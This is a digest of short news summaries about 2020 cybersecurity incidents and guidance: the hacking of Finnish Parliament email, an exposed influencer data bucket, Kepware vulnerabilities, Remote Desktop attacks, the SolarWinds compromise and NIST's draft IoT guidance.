    Email accounts belonging to Finnish lawmakers were accessed by hackers during a cyberattack on the Finnish Parliament's IT system. A statement released by Tero Muurman, the inspector at the National Bureau of Investigation, revealed that the malicious actors behind the suspected espionage operation were able to obtain information to benefit a foreign state or to inflict harm to Finland. The exact number of lawmakers impacted by this attack remains unclear. However, multiple persons are claimed to have been targeted by the attackers in the incident. The Speaker of Finland's Parliament stresses that the incident is an attack against Finland's democracy. This article continues to discuss the cyberattack faced by the Finnish Parliament and other incidents in which nation-state hackers have targeted national legislatures.

    CyberScoop reports "Finnish Lawmakers' Emails Hacked in Suspected Espionage Incident"

  • news

    Visible to the public "Misconfigured AWS Bucket Exposes Hundreds of Social Influencers"

    Researchers at vpnMentor have discovered that a misconfigured cloud storage bucket has exposed hundreds of social media influencers' personal details, potentially putting them at risk of fraud and harassment. The misconfigured AWS S3 bucket was discovered back in early November and was wide open with no encryption or password protection. The researchers notified Barcelona-based company 21 Buttons about the misconfigured AWS S3 bucket in November. However, no action has been taken by the company to fix the issue. The misconfigured cloud storage bucket contains 50 million files, which are mainly influencer photos and videos. The research team also discovered hundreds of invoices related to payments made to the social media influences. Among the personally identifiable information (PII) exposed were full names, postal codes, bank details, national ID numbers, and PayPal email addresses.

    Infosecurity reports: "Misconfigured AWS Bucket Exposes Hundreds of Social Influencers"

  • news

    Visible to the public "Critical Flaws in Kepware Products Can Facilitate Attacks on Industrial Firms"

    The U.S. Homeland Security Department's Cybersecurity & Infrastructure Security Agency (CISA) recently published advisories about vulnerabilities in Kepware products discovered by researchers at the industrial cybersecurity firm Claroty. One of the advisories discusses three of the flaws, two of which are rated critical, and one considered high in severity. These vulnerabilities are described as a stack-based overflow, a heap-based buffer overflow, and a use-after-free bug. The exploitation of the critical vulnerabilities could lead to server crashes, data leakage, remote code execution, and a Denial-of-Service (DoS) condition. An attacker could abuse the high-severity bug to crash the server by creating and closing OPC UA connections at a high rate. According to Uri Katz, a senior researcher at Claroty, the vulnerabilities were discovered in KEPServerEX, ThingWorx, and OPC-Aggregator OPC products. Attackers must have network access to the OPC server to exploit these flaws. Research has shown that the flaws can be exploited remotely without authentication. This article continues to discuss the discovery, exploitation, and potential impact of the critical flaws in Kepware products.

    Security Week reports "Critical Flaws in Kepware Products Can Facilitate Attacks on Industrial Firms"

  • news

    Visible to the public "Remote Desktop Bugs: Patches That Took Priority in a Pandemic Year"

    Microsoft released patches for a record number of common vulnerabilities and exposures in 2020, many of which impacted the Microsoft Remote Desktop Protocol (RDP). The Remote Desktop service proved essential during the COVID-19 pandemic as many organizations have transitioned to remote work structures. According to Satnam Narang, a research engineer at Tenable, Microsoft has patched a total of 1,245 bugs this year, significantly exceeding the 840 bugs fixed in 2019 and the combined total of bugs patched in 2017 and 2018. The increased use of the Remote Desktop Client, Remote Desktop Services, and Remote Desktop Gateway during the pandemic has made them more appealing targets for hackers. Brute force is the most common type of attack executed against RDP in which criminals try different username and password combinations for an RDP connection until one is accepted. There was a surge in the use of this attack method in early March, resulting in the total number of attacks reaching 3.3. billion within the first 11 months of 2020. This article continues to discuss Microsoft's prioritization of Remote Desktop flaws this year, the increased targeting of protocols by attackers, the launch of brute force attacks against RDP, and the growth in security research surrounding RDP.

    Dark Reading reports "Remote Desktop Bugs: Patches That Took Priority in a Pandemic Year"

  • news

    Visible to the public "SolarWinds Hackers 'Impacting' State and Local Governments"

    The U.S. Homeland Security Department's Cybersecurity & Infrastructure Security Agency (CISA) issued a warning about the significant impact of the recent SolarWinds Orion software supply chain hacking attack. The attack on SolarWinds' Orion IT management platform affected several U.S. government agencies, including the departments of Treasury, Commerce, and Homeland Security. This attack also compromised critical infrastructure and organizations in the private domain. CISA urges all federal civilian agencies to review their networks for signs of compromise as well as disconnect SolarWinds Orion products. The agency has emphasized the significance of this cyber incident as it has impacted the U.S. federal, state, and local governments, in addition to critical infrastructure entities and private organizations. According to CISA, the Advanced Persistent Threat (APT) actor behind the SolarWinds supply chain attack is well-resourced and has extensively abused commonly used authentication mechanisms. The agency calls on organizations to prioritize the identification and elimination of this threat as it could lead to the exposure of highly sensitive information. CISA is working with the Federal Bureau of Investigation (FBI) and the Office of the Director of National Intelligence (ODNI) to form a Cyber Unified Coordination Group (UCG), which will establish a coordinated whole-of-government approach to addressing the SolarWinds attack. This article continues to discuss the impact and severity of the SolarWinds attack, as well as CISA's recommendations to organizations on addressing this threat and other efforts by the agency to respond to the attack.

    Infosecurity Magazine reports "SolarWinds Hackers 'Impacting' State and Local Governments"

  • news

    Visible to the public "NIST Releases Draft Guidance for IoT Cybersecurity"

    The National Institute of Standards (NIST) has released a draft version of Special Publication (SP) 800-213 and a number of supporting documents developed to provide cybersecurity guidance to manufacturers of Internet of Things (IoT) devices. The draft version of SP 800-213 highlights certain concerns that Federal agencies must consider when obtaining IoT devices, further expanding upon NIST's Cybersecurity Framework and its Risk Management Framework. This guide includes ten specific questions that agencies should ask when establishing requirements. These questions cover aspects such as the interaction of an IoT device with the broader network. The document includes recommendations on what agencies should look for regarding the security capabilities that an IoT device needs to provide before it is integrated into Federal information systems. This article continues to discuss the goal and contents of the draft version of SP 800-213 and other draft documents on IoT security released by NIST.

    MeriTalk reports "NIST Releases Draft Guidance for IoT Cybersecurity"